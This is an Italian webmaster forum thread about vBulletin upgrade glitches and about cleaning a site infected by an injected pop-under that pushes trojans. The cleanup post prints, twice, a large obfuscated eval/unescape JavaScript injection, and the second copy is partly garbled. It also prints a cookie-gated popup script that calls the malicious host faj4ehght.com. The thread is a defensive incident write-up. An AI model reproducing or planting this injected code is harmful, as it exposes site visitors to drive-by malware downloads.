meth.master

meth.master

Ho trovato l'errore, allora, nel caso capitasse anche voi, posto la soluzione.

Se aggiornate da vbulletin 3.7 a 4.0.3 bisogna rivedere i diritti degli amministratori. infatti on l'amministratore principale le due voci indicate si vedono, mentre negli altri no, ache se questi sono abilitati. Ho cambiato gli amministratori secondari su un secondo gruppo e dopo li ho ripostati nel principale. Lo so, sembra quasi una demenziata ma io sono riuscito risolvere in questa maniera.

meth.master

Ancora niente, ho messo nuovamente il linguaggio ma non appare la voce pubblicità; ho disabilitato il plugin hook, per vedere se potava dipendera da un prodotto o pligin ma non dipende da questo. Sto cercando di darvi tutte le informazioni che rilevo nel caso qualuno di vuoi vole aiutarmi a capire dove possa annidiarsi questo stranissimo problema, dato che le pubblicità che avevo messo compaiono regolamente.

meth.master

Ho notato che sono sparite anche le voci linkback e generazione sitemap xml. Non capisco se può essere dovuto dal fatto che ho cancellato anche la lingua inglese

meth.master

Ciao a tutti. Ho aggiornato il forum di un mio cliente passando da vbulletin 3.7 alla 4.0.3.
Nella 3.7 avevo installato il vbseo e vbseo-site-map, disinstallati prima dell'upgrade.
Questa mattina ho installato vbseo e vbseo sitemap per vb 4.0.3 e mi è sparita la voce pubblicità dal menu del pannello di controllo. Non capisco se è una casualità oppure dipenda da questi ultimi due prodotti installati, ma proprio non riesco a darmi una spiegazione. In tanti anni di vbulletin non riesco veramente a capire cosa possa essere successo.

Edit: ho disinstallato entrmabi per vedere se dipendava da questi due prodotti ma non è cambiato niente. Qualche consiglio?

meth.master

Allora ragazzi, il problema sono riuscito a risolverlo dando pò di attenzione ed effetuando test lato server. Cercherò di riassumere tutto il processo di analisi e bonifica, così che, ma speriamo di no, se qualcuno riscontrasse la stessa problematica potrà “facilmente” risolverla.

Il problema è dato da un file javascript oscurato, che viene scritto attraverso un file .pl che ricerca alcuni script deboli sul dominio, in particolare nei domini che risiedono sulla stessa Shell Hosting, e che a loro volta presentano delle vulnerabilità.

Il java script oscurato si chiama JS_AFIT.A, che viene richiamato sulle pagine del sito, o su alcuni file del server apache vulnerabili.
Attraverso il brute force, viene modificato un file javascript vulnerabile contenuto sul vostro sito, inserendo il codice di richiamo al “malware” sul document.write

Nel mio caso si è presentato in questa maniera:

document.write('<script language="javascript">$="%63c%3d%225ngt%2568;i%252b+)%257bt%256dp%253dds.%2573%256ci%2563e%2528i,i%252b1)%253bst%25%22;cu%3d%22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4%3czub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dobuf4d%7bdKazpqf4)4zaxx%2fbuf4d%7bdKw%7b%7b%257F}qKzuyq4)46upbyu%257FqfK%257F%7byud6%2fbuf4d%7bdK`}yq%7ba`4)4#%2526$%2frazw`}%7bz4d%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3dobuf4}gKqzuvxqp4)4ruxgq%2f}r4%3c5c}zp%7bc:%7bdqfu42245zub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dfq`afz4}gKqzuvxqp%2f}r4%3c`mdq%7br4p%7bwayqz`:w%7b%7b%257F}q4))43g`f}zs3%3d}r4%3cp%7bwayqz`:w%7b%7b%257F}q:xqzs`|4))4$%3dop%7bwayqz`:w%7b%7b%257F}q4)46`qg`6%2f}gKqzuvxqp4)4p%7bwayqz`:w%7b%7b%257F}q4))43`qg`3%2fp%7bwayqz`:w%7b%7b%257F}q4)433%2fiqxgqo}gKqzuvxqp4)4`faq%2fifq`afz4}gKqzuvxqp%2firazw`}%7bz4d%7bdKsq`W%7b%7b%257F}q%3czuyq%3dobuf4w%7b%7b%257F}q4)46464?4p%7bwayqz`:w%7b%7b%257F}q%2fbuf4gqufw|4)46464?4zuyq4?46)6%2fbuf4gq`G`f4)4zaxx%2fbuf4%7brrgq`4)4$%2fbuf4qzp4)4$%2f}r4%3cw%7b%7b%257F}q:xqzs`|4*4$%3do%7brrgq`4)4w%7b%7b%257F}q:}zpql[r%3cgqufw|%3d%2f}r4%3c%7brrgq`45)49%25%3do%7brrgq`4?)4gqufw|:xqzs`|%2fqzp4)4w%7b%7b%257F}q:}zpql[r%3c6%2f684%7brrgq`%3d%2f}r4%3cqzp4))49%25%3doqzp4)4w%7b%7b%257F}q:xqzs`|%2figq`G`f4)4azqgwudq%3cw%7b%7b%257F}q:gavg`f}zs%3c%7brrgq`84qzp%3d%3d%2fiifq`afz%3cgq`G`f%3d%2firazw`}%7bz4d%7bdKgq`W%7b%7b%257F}q4%3czuyq84buxaq%3dop%7bwayqz`:w%7b%7b%257F}q4)4zuyq4?46)64?4qgwudq%3cbuxaq%3d4?46%2f4qld}fqg)Rf}pum8%27%259Pqw9!$4%2526%27.!-.!-4SY@%2f4du`|);%2f6%2firazw`}%7bz4g|%7bcKd%7bd%3c%3dobuf4d%7bdKczp4)46|``d.;;rvwyr}f:w%7by;ws}9v}z;}zpql:ws}+sf%7bv}z6%2fbuf4rquKczp4)46gwf%7bxxvufg)%258fqg}nuvxq)%258`%7b%7bxvuf)%258x%7bwu`}%7bz)%258yqzavuf)%258g`u`ag)%258p}fqw`%7bf}qg)$6%2fbuf4zqqpK%7bdqz4)4`faq%2f}r4%3cp%7bwayqz`:%7bzwx}w%257FKw%7bdm45)4zaxx%3dp%7bwayqz`:%7bzwx}w%257FKw%7bdm%3c%3d%2f}r4%3cp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm45)4zaxx%3dp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm%3c%3d%2f}r4%3cd%7bdKazpqf45)4zaxx%3do}r4%3c5d%7bdKazpqf:wx%7bgqp%3dzqqpK%7bdqz4)4ruxgq%2fi}r4%3czqqpK%7bdqz%3do}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3dobux4)4d%7bdKsq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq%3d%2f}r4%3cbux45)4zaxx%3doz%7bc4)4zqc4Pu`q%3c%3d%2fbux%25264)4zqc4Pu`q%3cbux%3d%2fa`w%27%25264)4Pu`q:A@W%3cz%7bc:sq`RaxxMquf%3c%3d84z%7bc:sq`Y%7bz`|%3c%3d84z%7bc:sq`Pu`q%3c%3d84z%7bc:sq`%255C%7bafg%3c%3d84z%7bc:sq`Y}za`qg%3c%3d84z%7bc:sq`Gqw%7bzpg%3c%3d%3d%2fa`w%25264)4Pu`q:A@W%3cbux%2526:sq`RaxxMquf%3c%3d84bux%2526:sq`Y%7bz`|%3c%3d84bux%2526:sq`Pu`q%3c%3d84bux%2526:sq`%255C%7bafg%3c%3d84bux%2526:sq`Y}za`qg%3c%3d84bux%2526:sq`Gqw%7bzpg%3c%3d%3d%2f}r4%3c4%3c4a`w%27%2526494a`w%25264%3d4;4%25$$$4(4d%7bdK`}yq%7ba`%3e%2522$%3dozqqpK%7bdqz4)4ruxgq%2fiiii}r4%3czqqpK%7bdqz%3doazpqf4)4c}zp%7bc:%7bdqz%3cd%7bdKczp846684rquKczp%3d%2fazpqf:vxaf%3c%3d%2fc}zp%7bc:r%7bwag%3c%3d%2f}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3doz%7bc4)4zqc4Pu`q%3c%3d%2fd%7bdKgq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq84z%7bc%3d%2fiiirazw`}%7bz4d%7bdK}z}`%3c%3dobuf4bqf4)4dufgqRx%7bu`%3czub}su`%7bf:uddBqfg}%7bz%3d%2fbuf4bqf%25264)4%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-!6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-,6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4Z@6%3d*)$4%3d22%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3[dqfu3%3d4))49%25%3d22%3czub}su`%7bf:uddZuyq45)43Zq`gwudq3%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3YG]Q3%3d4*49%25%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3GB%253%3d4*49%25%3d422%3cbqf4*)4%2520%3d%2f}r4%3cbqf%2526%3do}r4%3cp%7bwayqz`:x}z%257Fg%3dor%7bf4%3cbuf4})$%2f4}(p%7bwayqz`:x}z%257Fg:xqzs`|%2f4}??%3do}r4%3cp%7bwayqz`:x}z%257FgO}I:`ufsq`45)46Kvxuz%257F6%3dop%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F%2fp%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F4)4g|%7bcKd%7bd%2fiiiip%7bwayqz`:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz`:%7bzwx}w%257F%2fp%7bwayqz`:%7bzy%7bagqad4)4g|%7bcKd%7bd%2fid%7bdK}z}`%3c%3d%2fi(;gwf}d`*%22;ca%3d%22%2566%2575nc%2574%2569o%256e%2520dcs%2528ds%252ce%2573)%257bds%253dun%2565s%2563ap%22;de%3d%22M+}Sx-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:%2526950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;da%3d%22fqb0})-~ug0Qbbqi87|qe~%257F7%3c7%7brtfu7%3c7zsdxb7%3c7ytvyb7%3c7xufyv7%3c7wvhuc7%3c7vwfuc7%3c7uxwxd7%3c7tzu~y7%3c7s%7bud~7%3c7r||uf7%3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%257F7%22;dd%3d%22iSx%2522%3c}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950%25265##950%2522%2526M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209%22;db%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudT%22;ce%3d%22%2561%2572Co%2564e%2541t(%2530)^%2528%25270x0%2530%2527+es%2529%2529);}%257d%22;st%3d%22%2573%2574%253d%2522$%253dst%253bd%2563s%2528d%2561+%2564b%252b%2564c%252b%2564d%252bd%2565%252c%25310%2529;%2564%2577%2528%2573%2574)%253bs%2574%253d$%253b%2522;%22;op%3d%22%2524%253d%2522dw(dc%2573%2528c%2575,1%2534%2529);%2522;%22;dz%3d%22%2566u%256ecti%256fn%2520dw%2528%2574)%257bc%2561%253d%2527%252564o%252563%252575me%256e%252574%25252ewr%252569t%252565%252528%252522%2527;c%2565%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t%2525%25320la%256e%252567%2575%252561%252567%2565%25253d%25255c%25252%2532j%2561va%25257%2533%2563ri%252570t%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252f%2573c%2572i%2570%252574%25253e%2527;%2565%2576a%256c%2528un%2565sca%2570e(%2574))%257d;%22;cb%3d%22e%2528ds%2529;%2573t%253dt%256dp%253d%2527%2527;for(%2569%253d%2530;i%253cds.l%256%22;cz%3d%22%2566%2575%256ect%2569on%2520%2563z%2528cz)%257bret%2575rn%2520%2563a%252bc%2562+%2563c%252bcd+%2563e+%2563z;%257d;%22;dc%3d%22qi89;%25229+u|cu0d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vyb%3es%257F}7+fqb0iSx!%3c%22;cd%3d%223dst+%2553tr%2569n%2567.f%2572%256fmCh%2561rC%256f%2564e((%2574%256d%2570.%2563h%22;%69f%20%28d%6f%63um%65nt%2eco%6fk%69e.%69n%64ex%4ff%28%27vbu%6clet%69n%5f%6du%6cti%71u%6f%74%65%3d%27)%3d%3d-1%29%7bs%63%28%27vbull%65tin%5fmul%74iqu%6ft%65%3d%27,2,7%29;ev%61l(u%6e%65s%63%61%70e(%64z+%63z+o%70+st%29+%27d%77(%64z%2b%63z%28$%2b%73t)%29;%27)%7dels%65%7b$%3d%27%27};functio%6e sc%28c%6em,v%2ced)%7bva%72 ex%64%3dn%65%77 Da%74%65%28);%65x%64.se%74Dat%65%28exd%2ege%74%44%61te(%29+%65%64);%64oc%75%6dent%2ecoo%6bie%3d%63nm%2b %27%3d%27 +e%73%63ape%28v)+%27%3b%65xpi%72es%3d%27+exd.to%47M%54%53tr%69%6eg%28);%7d;";eval(unescape($));document.write($);</script>');
```  Era posto su un javascript di un partner site incluso in tutte el aree del mio portale, meno che nel forum.
 
Il codice apre un popup alla webpage che scarica automaticamente i due trojan, ed è impostato in maniera tale che se i cookies rimangono validati sul sito infetto venga visualizzato solo una volta, così da non insospettire il webmaster attraverso e-mail di avviso, o comunque far credere all&#8217;utente che si tratta di un caso isolato. Quando i cookies vengono eliminati dal browser o dal portale, il problema riappare.
 
Ecco il codice che agisce sui cookies:

if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "advmaker_komap";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "LINK faj4ehght.com/cgi-bin/index.cgi?grobin";var fea_wnd = "scrollbars=›esizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links.target != "_blank"){document.links*.onclick_copy = document.links*.onclick;document.links*.onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}

  Procediamo entrando nella nella pagina infetta e attraverso la web developer toolbar andiamo sulla funzione INFORMATION e dal menù scegliamo la voce View Javascript.
   
  Si aprirà una pagina che mostrerà tutto il codice javascript contenuto nella pagina infetta. 
  A questo punto si presenteranno due codici, ovvero il codice del **document.write** e il codice **if (navigator.cookieEnabled)&#8230;..**

  **Nota:** il codice **if (navigator.cookieEnabled)&#8230;** Potrebbe non apparire se il popup malevolo è stato già visualizzato, e quindi è iniziata la sessione di registrazione dei cookies.
   
  A questo punto cerchiamo il file javascript che è stato compromesso con questo codice:

document.write('<script language="javascript">$="%63c%3d%225ngt%2568;i%252b+)%257bt%256dp%253dds.%2573%256ci%2563e%2528i,i%252b1)%253bst%25%22;cu%3d%22(gwf}d4xuzsausq)6~ubugwf}d6*}r4%3czub}su%7bf:w%7b%7b%257F}qQzuvxqp%3dobuf4d%7bdKazpqf4)4zaxx%2fbuf4d%7bdKw%7b%7b%257F}qKzuyq4)46upbyu%257FqfK%257F%7byud6%2fbuf4d%7bdK}yq%7ba4)4#%2526$%2frazw}%7bz4d%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3dobuf4}gKqzuvxqp4)4ruxgq%2f}r4%3c5c}zp%7bc:%7bdqfu42245zub}su%7bf:w%7b%7b%257F}qQzuvxqp%3dfqafz4}gKqzuvxqp%2f}r4%3cmdq%7br4p%7bwayqz:w%7b%7b%257F}q4))43gf}zs3%3d}r4%3cp%7bwayqz:w%7b%7b%257F}q:xqzs|4))4$%3dop%7bwayqz:w%7b%7b%257F}q4)46qg6%2f}gKqzuvxqp4)4p%7bwayqz:w%7b%7b%257F}q4))43qg3%2fp%7bwayqz:w%7b%7b%257F}q4)433%2fiqxgqo}gKqzuvxqp4)4faq%2fifqafz4}gKqzuvxqp%2firazw}%7bz4d%7bdKsqW%7b%7b%257F}q%3czuyq%3dobuf4w%7b%7b%257F}q4)46464?4p%7bwayqz:w%7b%7b%257F}q%2fbuf4gqufw|4)46464?4zuyq4?46)6%2fbuf4gqGf4)4zaxx%2fbuf4%7brrgq4)4$%2fbuf4qzp4)4$%2f}r4%3cw%7b%7b%257F}q:xqzs|4*4$%3do%7brrgq4)4w%7b%7b%257F}q:}zpql[r%3cgqufw|%3d%2f}r4%3c%7brrgq45)49%25%3do%7brrgq4?)4gqufw|:xqzs|%2fqzp4)4w%7b%7b%257F}q:}zpql[r%3c6%2f684%7brrgq%3d%2f}r4%3cqzp4))49%25%3doqzp4)4w%7b%7b%257F}q:xqzs|%2figqGf4)4azqgwudq%3cw%7b%7b%257F}q:gavgf}zs%3c%7brrgq84qzp%3d%3d%2fiifqafz%3cgqGf%3d%2firazw}%7bz4d%7bdKgqW%7b%7b%257F}q4%3czuyq84buxaq%3dop%7bwayqz:w%7b%7b%257F}q4)4zuyq4?46)64?4qgwudq%3cbuxaq%3d4?46%2f4qld}fqg)Rf}pum8%27%259Pqw9!$4%2526%27.!-.!-4SY@%2f4du|);%2f6%2firazw}%7bz4g|%7bcKd%7bd%3c%3dobuf4d%7bdKczp4)46|``d.;;rvwyr}f:w%7by;ws}9v}z;}zpql:ws}+sf%7bv}z6%2fbuf4rquKczp4)46gwf%7bxxvufg)%258fqg}nuvxq)%258%7b%7bxvuf)%258x%7bwu}%7bz)%258yqzavuf)%258guag)%258p}fqw%7bf}qg)$6%2fbuf4zqqpK%7bdqz4)4faq%2f}r4%3cp%7bwayqz:%7bzwx}w%257FKw%7bdm45)4zaxx%3dp%7bwayqz:%7bzwx}w%257FKw%7bdm%3c%3d%2f}r4%3cp%7bwayqz:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm45)4zaxx%3dp%7bwayqz:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm%3c%3d%2f}r4%3cd%7bdKazpqf45)4zaxx%3do}r4%3c5d%7bdKazpqf:wx%7bgqp%3dzqqpK%7bdqz4)4ruxgq%2fi}r4%3czqqpK%7bdqz%3do}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3dobux4)4d%7bdKsqW%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq%3d%2f}r4%3cbux45)4zaxx%3doz%7bc4)4zqc4Puq%3c%3d%2fbux%25264)4zqc4Puq%3cbux%3d%2faw%27%25264)4Puq:A@W%3cz%7bc:sqRaxxMquf%3c%3d84z%7bc:sqY%7bz|%3c%3d84z%7bc:sqPuq%3c%3d84z%7bc:sq%255C%7bafg%3c%3d84z%7bc:sqY}zaqg%3c%3d84z%7bc:sqGqw%7bzpg%3c%3d%3d%2faw%25264)4Puq:A@W%3cbux%2526:sqRaxxMquf%3c%3d84bux%2526:sqY%7bz|%3c%3d84bux%2526:sqPuq%3c%3d84bux%2526:sq%255C%7bafg%3c%3d84bux%2526:sqY}zaqg%3c%3d84bux%2526:sqGqw%7bzpg%3c%3d%3d%2f}r4%3c4%3c4aw%27%2526494aw%25264%3d4;4%25$$$4(4d%7bdK}yq%7ba%3e%2522$%3dozqqpK%7bdqz4)4ruxgq%2fiiii}r4%3czqqpK%7bdqz%3doazpqf4)4c}zp%7bc:%7bdqz%3cd%7bdKczp846684rquKczp%3d%2fazpqf:vxaf%3c%3d%2fc}zp%7bc:r%7bwag%3c%3d%2f}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3doz%7bc4)4zqc4Puq%3c%3d%2fd%7bdKgqW%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq84z%7bc%3d%2fiiirazw}%7bz4d%7bdK}z}%3c%3dobuf4bqf4)4dufgqRx%7bu%3czub}su%7bf:uddBqfg}%7bz%3d%2fbuf4bqf%25264)4%3czub}su%7bf:agqfUsqz:}zpql[r%3c6C}zp%7bcg4-!6%3d*)$4hh4zub}su%7bf:agqfUsqz:}zpql[r%3c6C}zp%7bcg4-,6%3d*)$4hh4zub}su%7bf:agqfUsqz:}zpql[r%3c6C}zp%7bcg4Z@6%3d*)$4%3d22%3czub}su%7bf:agqfUsqz:}zpql[r%3c3[dqfu3%3d4))49%25%3d22%3czub}su%7bf:uddZuyq45)43Zqgwudq3%3d422%3czub}su%7bf:agqfUsqz:}zpql[r%3c3YG]Q3%3d449%25%3d422%3czub}su%7bf:agqfUsqz:}zpql[r%3c3GB%253%3d449%25%3d422%3cbqf4*)4%2520%3d%2f}r4%3cbqf%2526%3do}r4%3cp%7bwayqz:x}z%257Fg%3dor%7bf4%3cbuf4})$%2f4}(p%7bwayqz:x}z%257Fg:xqzs|%2f4}??%3do}r4%3cp%7bwayqz:x}z%257FgO}I:ufsq45)46Kvxuz%257F6%3dop%7bwayqz:x}z%257FgO}I:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz:x}z%257FgO}I:%7bzwx}w%257F%2fp%7bwayqz:x}z%257FgO}I:%7bzwx}w%257F4)4g|%7bcKd%7bd%2fiiiip%7bwayqz:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz:%7bzwx}w%257F%2fp%7bwayqz:%7bzy%7bagqad4)4g|%7bcKd%7bd%2fid%7bdK}z}%3c%3d%2fi(;gwf}d*%22;ca%3d%22%2566%2575nc%2574%2569o%256e%2520dcs%2528ds%252ce%2573)%257bds%253dun%2565s%2563ap%22;de%3d%22M+}Sx-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:%2526950%2522%279M+4-4%3ebu|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;da%3d%22fqb0})-~ug0Qbbqi87|qe~%257F7%3c7%7brtfu7%3c7zsdxb7%3c7ytvyb7%3c7xufyv7%3c7wvhuc7%3c7vwfuc7%3c7uxwxd7%3c7tzu~y7%3c7s%7bud~7%3c7r||uf7%3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%257F7%22;dd%3d%22iSx%2522%3c}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950%25265##950%2522%2526M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209%22;db%3d%22%3c77%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudT%22;ce%3d%22%2561%2572Co%2564e%2541t(%2530)^%2528%25270x0%2530%2527+es%2529%2529);}%257d%22;st%3d%22%2573%2574%253d%2522$%253dst%253bd%2563s%2528d%2561+%2564b%252b%2564c%252b%2564d%252bd%2565%252c%25310%2529;%2564%2577%2528%2573%2574)%253bs%2574%253d$%253b%2522;%22;op%3d%22%2524%253d%2522dw(dc%2573%2528c%2575,1%2534%2529);%2522;%22;dz%3d%22%2566u%256ecti%256fn%2520dw%2528%2574)%257bc%2561%253d%2527%252564o%252563%252575me%256e%252574%25252ewr%252569t%252565%252528%252522%2527;c%2565%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t%2525%25320la%256e%252567%2575%252561%252567%2565%25253d%25255c%25252%2532j%2561va%25257%2533%2563ri%252570t%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252f%2573c%2572i%2570%252574%25253e%2527;%2565%2576a%256c%2528un%2565sca%2570e(%2574))%257d;%22;cb%3d%22e%2528ds%2529;%2573t%253dt%256dp%253d%2527%2527;for(%2569%253d%2530;i%253cds.l%256%22;cz%3d%22%2566%2575%256ect%2569on%2520%2563z%2528cz)%257bret%2575rn%2520%2563a%252bc%2562+%2563c%252bcd+%2563e+%2563z;%257d;%22;dc%3d%22qi89;%25229+u|cu0d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vyb%3es%257F}7+fqb0iSx!%3c%22;cd%3d%223dst+%2553tr%2569n%2567.f%2572%256fmCh%2561rC%256f%2564e((%2574%256d%2570.%2563h%22;%69f%20%28d%6f%63um%65nt%2eco%6fk%69e.%69n%64ex%4ff%28%27vbu%6clet%69n%5f%6du%6cti%71u%6f%74%65%3d%27)%3d%3d-1%29%7bs%63%28%27vbull%65tin%5fmul%74iqu%6ft%65%3d%27,2,7%29;ev%61l(u%6e%65s%63%61%70e(%64z+%63z+o%70+st%29+%27d%77(%64z%2b%63z%28$%2b%73t)%29;%27)%7dels%65%7b$%3d%27%27};functio%6e sc%28c%6em,v%2ced)%7bva%72 ex%64%3dn%65%77 Da%74%65%28);%65x%64.se%74Dat%65%28exd%2ege%74%44%61te(%29+%65%64);%64oc%75%6dent%2ecoo%6bie%3d%63nm%2b %27%3d%27 +e%73%63ape%28v)+%27%3b%65xpi%72es%3d%27+exd.to%47M%54%53tr%69%6eg%28);%7d;";eval(unescape($));document.write($);</script>');

      

  **E se è stato un file del server ad essere infettato?**
    Il file del server che viene infettato ha la stessa linea di codice ma non usa i cookies, quindi il gestori del server avranno lo stesso problema su tutti i siti presenti nel server infettato e saranno, si spera, loro stessi a rimuoverli o comunque è bene inoltrare segnalazione del problema non appena questo viene riscontrato.
  
Spero di essere stato in qualche modo d'aiuto. Ringrazio l'amico nassim per avermi dato alcuni imput necessari a concentrare l'attenzione su alcuni aspetti che avevo trascurato e che mi hanno portato a risolvere il problema.

meth.master

Salve, un saluto a tutto il forum GT.
Ragazzi, vi scrivo perchè ho un problema, che malgrado le conoscenze non riesco a risolvere.
In uno dei miei siti web, all'apertura della home page, si apre atomaticamente un link che porta a scaricare dei trojan, il link in questione è questo: faj4ehght.com (per favore, è mio dovere avvisarvi che all'apertura del link citato due trojan proveranno a scaricarsi sul vostro pc, quindi meglio non entrarci)

Sto smanettando da qualche settimana e non riesco a cavarne piede. Questo succede solo sul portale, che adesso è stata messo offline, mentre nel forum, Vbulletin, questo problema non accade.

Sapreste darmi un consiglio per provare ad eliminarlo?
Leggendo su qualche altro sito non sono l'unico ad avere questo problema, però non c'è un qualcosa sulla sua risoluzione in merito.

Rimango in attesa di un vostro consiglio, parere o qualsiasi spunto per risolvere questo problema. Sono in prima pagina sui motori di ricerca e questo problema mi sta facendo, in qualche modo, perdere posizioni, che ho arginato attraverso il robot, facendogli visitare delle pagine in redirect e bloccando l'accesso a quelle che sembrano essere infette.

